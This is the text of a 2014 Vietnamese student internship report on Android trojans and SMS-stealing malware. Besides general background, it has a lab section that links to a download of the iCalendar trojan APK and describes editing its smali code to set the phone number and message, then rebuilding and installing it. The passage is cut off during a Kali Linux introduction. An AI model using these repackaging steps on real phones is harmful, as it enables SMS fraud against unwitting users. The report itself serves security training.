SlideShare a Scribd company logo
1 of 64
1 
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ 
CHÍ MINH 
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ 
NHIÊN 
KHOA ĐIỆN TỬ VIỄN THÔNG 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086 
TRUNG TÂM ĐÀO TẠO 
QUẢN TRỊ MẠNG & AN 
NINH MẠNG QUỐC TẾ 
ATHENA 
BÁO CÁO THỰC TẬP 
Đề tài: 
Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điên 
thoại sử dụng Android và gửi ra ngoài 
GVHD: Thầy Võ Đỗ Thắng 
SVTH: Nguyễn Hoàng Đức Lâm 
MSSV: 1120086 
TPHCM, ngày tháng năm 2014
Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên và Khoa Điện Tử 
Viễn thông đã tạo điều kiện cho tôi hoàn thành tốt đợt thực tập này. Trong đợt thực tập này 
đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn 
trong công việc và môi trường làm việc sau này. 
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân. 
Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh 
khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể 
làm tốt hơn nữa. 
2 
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG 
Một lần nữa tôi xin chân thành cảm ơn. 
TPHCM, ngày tháng năm 2014 
Sinh viên thực tập 
Nguyễn Hoàng Đức Lâm 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
3 
NHẬN XÉT CỦA KHOA 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
TPHCM, ngày ... tháng ... năm 2014 
Trưởng Khoa 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng 
các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt 
tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo mọi 
điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến 
quý báu để hoàn thành tốt bài báo cáo này. 
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân. 
Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh 
khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể 
làm tốt hơn nữa. 
4 
LỜI CẢM ƠN TRUNG TÂM ATHENA 
Một lần nữa tôi xin chân thành cảm ơn. 
TPHCM, ngày tháng năm 2014 
Chú thích: Hình Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thực tập (Nguyễn Hoàng Đức Lâm) 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
5 
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI 
TRUNG TÂM 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
................................................................................................................................................ 
TPHCM, ngày ... tháng ... năm 2014 
Giảng Viên Hướng Dẫn 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
 Những nội dung trong báo cáo này là do tôi thực hiện dưới sự hướng dẫn trực 
 Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, 
 Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi xin 
6 
LỜI CAM ĐOAN 
Tôi xin cam đoan: 
tiếp của thầy Võ Đỗ Thắng. 
tên công trình, thời gian, địa điểm công bố. 
chịu hoàn toàn trách nhiệm. 
TPHCM, ngày tháng năm 2014 
Sinh viên thực tập 
Nguyễn Hoàng Đức Lâm 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày càng 
nóng. Với sự phát triển đến chóng mặt của các nền tảng do động như iOS, Android, 
Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo, mật thông tin 
chuyển dần xu hướng từ PC sang mobile đặc biệt là Smartphone. Nếu bạn đang sở hữu một 
chiếc Smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, Sony,…liệu bạn có 
dám chắc chắn là “dế cưng” của mình không bị nhiễm các phần mềm gián điệp, nghe lén 
không?. Vì sao lại như vậy?. Vì theo báo cáo gần đây của các hãng phần mềm bảo mật như 
Kaspersky Lab, Norton AV, Avast hay BKAV số lượng Smartphone bị nhiễm mã độc ngày 
càng tang. Đặc biệt hệ điều hành Android là một hệ điều hành phát triển khá nhanh trong 
những năm gần đây, là một mảnh đất béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả 
tin, thiêu hiểu biết của người dùng, long tham các thứ “Free” như free app, free wifi đã vô 
tình tiếp tay cho các Hacker xâm nhập và cài mã độc trên chính chiếc điện thoại của bạn. 
Đề tài “Ngiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách 
contact, tin nhắn trên điện thoại Android và gửi ra ngoài” sẽ giúp giúp nghiên cứu tìm hiểu 
cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh. 
7 
LỜI MỞ ĐẦU 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
8 
MỤC LỤC 
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG ..................................................... 2 
NHẬN XÉT CỦA KHOA ............................................................................................... 3 
LỜI CẢM ƠN TRUNG TÂM ATHENA .................................................................... 4 
NHẬN XÉT CỦA G IẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM................. 5 
LỜI CAM ĐOAN ............................................................................................................. 6 
LỜI MỞ ĐẦU.................................................................................................................... 7 
MỤC LỤC .......................................................................................................................... 8 
A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP .............................................. 9 
B. THỰC HÀNH................................................................................................... 11 
I. Giới thiệu về Hệ Điều Hành Android......................................................................... 11 
II. Giới thiệu Trojan và sử dụng Trojan t ấn công máy android .................................. 13 
III.Giới thiệu Malware và sử dụng Malware tấn công máy android.........................19 
Phân 1: Làm trên mạng Local Lan.................................................................39 
Phần 2: Làm trên môi trường VPS ................................................................46 
C. KẾT QUẢ ĐẠT ĐƯỢC................................................................................. 62 
D. DANH SÁCH CÁC CLIP........................................................................63 
E. TRÍCH DẪN NGUỒN THAM KHẢO....................................................64 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
- Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được 
thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng 
động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp 
phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế 
mũi nhọn, góp phần phát triển nước nhà. 
 Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản 
trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các 
hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song song đó, 
trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng t heo 
đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh 
nghiệp, các cơ quan chính phủ, tổ chức tài chính… 
 Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là 
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho 
nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, 
9 
A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP 
Cơ sở 1_Tại TP Hồ Chí Minh: 
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. 
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. 
Điện thoại: ( 84-8 ) 3824 4041 
Hotline: 0943 23 00 99 
Cơ sở 2_Tại TP Hồ Chí Minh: 
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. 
Website: www.athena.edu.vn or www.athena.com.vn 
Điện thoại: (84-8) 2210 3801 
Hotline: 0943 20 00 88 
- Lĩnh vực hoạt động: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
 Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp 
tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố 
Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn 
Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự… 
 Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học 
hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ 
quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm 
Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc 
để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA. 
 Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức 
công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore và truyền 
đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA. 
10 
Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… 
Đội ngũ giảng viên: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Tổng công ty Android (Android, Inc.) được thành lập tại 
Palo Alto, California vào tháng 10 năm 2003 bởi Andy 
Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng 
sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears 
(từng là Phó giám đốc T-Mobile), và Chris White (trưởng 
thiết kế và giao diện tại WebTV) để phát triển, theo lời của 
Rubin, "các thiết bị di động thông minh hơn có thể biết 
được vị trí và sở thích của người dùng". Dù những người 
thành lập và nhân viên đều là những người có tiếng tăm, 
Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm 
dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn 
thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty. 
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một 
bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm 
Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm 
đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự 
tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng 
đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá 
nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ 
thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng 
cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ 
khác nhau. 
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất 
hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google 
muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ 
lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng 
viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một 
vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, 
họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 
năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp 
một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động. 
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội 
bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC, 
Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, 
Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết 
11 
B.Thực hành 
I. Giới thiệu về Hệ Điều Hành Android 
Lịch sử 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên 
minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện 
thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. 
Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế 
Irina Blok tại California vẽ. 
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ 
sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được 
đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên 
bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). 
Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt 
loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy 
hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong 
chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia 
nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do 
LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị 
Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android. 
Đặc đi ểm 
1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng 
dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. 
Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện 
thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển 
tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây 
dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa 
bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có 
thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp 
tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo 
2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các 
ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để 
truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết 
bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu 
cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng 
dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình 
thích. 
3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và 
cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên 
điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp 
chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một 
ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi 
họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của 
MapView và dịch vụ định vị toàn cầu GPS. 
4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện giao diện 
lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android 
12 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị 
giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm 
nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ 
dàng. 
II. Giới thiệu Trojan và sử dụng Trojan tấn công máy 
Trojan - một chương trình dạng virus, một kẻ làm nội gián trong 
máy tính của bạn đã giúp cho hacker điều khiển máy tính của 
bạn, Trojan giúp hacker lấy những thông tin quý báu của bạn, 
thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của bạn 
nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm 
thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn 
trong những chương trình trò chơi, những chương trình mà bạn 
không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của các chủ 
thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến 
các thuê bao cần tấn công thông qua thư điện tử (e-mail) dưới 
dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này, 
lập tức Trojan được kích động và tự động sao chép lại tất cả các thông số về mật khẩu của 
chủ thuê bao. Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm 
thư điện tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan 
sẽ bí mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần 
thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ mà 
hacker nội đã định sẵn. 
Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức tinh 
vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy như 
thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín để đánh 
lừa chủ thuê bao bằng chương trình phần mềm thư ma Ghostmail. "tin tặc" dễ dàng thảo ra 
những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao 
đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình 
phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt" chuyê n 
gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng: "Ðể phòng chống 
virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài chương trình BKAV 383. Mong 
quý vị dùng thử Mọi ý kiến đóng góp xin gửi về địa chỉ sau quangnt@it-hut.edu.vn". Khi 
13 
android. 
1. Giới Thiệu 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
nhận được những tin kiểu như vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiê n" 
cho chạy chương trình vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyệ n" 
hiến mình thành nạn nhân của bọn "tin tặc". 
Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập Internet thì 
Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và thậm chí cả cấu 
hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin tặc. Nhưng nguy hiểm 
hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán 
cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy 
tính của hắn tới máy tính của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông 
tin... 
1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ 
Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi 
password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho biết là 
file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password. 
2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy 
3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là 
cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file 
Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò 
mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi, 
password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay passwor d 
mới. 
Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin 
1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những 
địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của chương 
trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn 
chương trình diệt virus mà thực chất là Trojan. 
14 
Các thủ đoạn của Hacker 
mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy. 
Ðề phòng, tìm và di ệt Trojan? 
trên mạng. 
Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng 
Internet với từ khóa "Detect and destroy Trojan". 
Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn 
có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE  Software  
Microsoft  Windows  Current Version  Run. Nếu thấy có đường dẫn tới một 
chương trình mà bạn biết là không phải của Window hoặc của các chương trình tiện 
ích, bạn hãy thoát Window về chế độ DOS và xóa tập tin theo đường dẫn của 
Registry, vào lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm 
tra cả tập tin Win.ini, System.ini trong thư mục C:Windows sau mục Run hoặc 
Load. 
iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người 
dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề 
mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do. 
15 
2. Hướng dẫn thực hi ện Trojan iCalendar trên Android 
 Ta mở công cụ supperApk tool, trước đó ta mở 2 máy ảo trước, và công cụ sẽ 
scan ra. 
 Sau đó ta vào Project New Project  chọn đến file iCalendar.apk 
Các bạn có thể tải iCalendar.apk search google hoặc từ trang 
http://search.4shared-china.com/q/CCAD/1/icalendar%20apk?suggested 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
 Sau khi upload xong dữ liệu thì bạn vào ViewView Smail Code để chỉnh sửa code 
16 
 Tiếp tục vào đường dẫn /com/mj/iCalendar.apk 
Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
- File iCalendar.smali , sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin 
- File SmsReceiver.smali , ta sửa code ở line 41 thành số điện thoại mà máy mình 
17 
nhắn) và line 253 (là nội dung tin nhắn) 
muốn gửi đến, giống như ở iCalendar.smali 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Sau khi sửa code ta save lại, và Run > Build (nhấn F5): cho phép bắt đầu quá trình cài đặt 
trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android 
khác.Chỉ cần mở iCalendar lên và ấn vài lần (khoảng 7 lần) là đã có một tin nhắn được gửi đi 
mà không mong muốn. 
18 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
III. Giới thiệu Malware (phần mềm độc hại) và sử dụng 
Theo thống kê của các hãng bảo mật trên thế giới thì 
hiện các Malware hiện nay mới chỉ dừng lại ở mức độ 
xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết 
quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần 
mềm gián điệp (Trojan) hơn là một virus phá hủy. 
- Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được 
quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu 
tiên. 
- Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission đặc 
biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các 
thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Việc 
cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các 
ứng dụng mà không được phép. 
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc 
lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là confirm, check-in. 
Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào (hầu hết vào khoảng 
thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là khoảng thời gian mà điện thoại ít 
có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc 
phát hiện một hành vi bất thường trên chiếc smartphone của mình. 
Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người 
dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể về sau đã 
19 
Malware tấn công máy android. 
1) Giới thiệu Malware: 
Malware (phần mềm ác tính) viết tắt của cụm từ 
Malicious Sofware, là một phần mềm máy tính được 
thiết kế với mục đích thâm nhập hoặc gây hỏng hóc 
máy tính mà người sử dụng không hề hay biết. 
Cơ chế hoạt động của Malware 
Malware này hoạt động qua hai giai đoạn: 
Mục đích của Malware 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được 
tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, 
việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người 
dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra 
các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS 
gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi 
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. 
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn 
đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị theo dõi, vì 
vậy những mối nguy hiểm từ mã độc trên Android đang thực sự đe dọa đến sự an toàn của 
người dùng hệ điều hành này. 
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra 
bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là 
BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử 
dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công 
bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTr ac k 
6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyê n 
20 
2) Giới thiệu hệ điều hành KaLi Linux 
gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với 
Kali phát triển trên nền tảng hệ điều hành Debian 
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ 
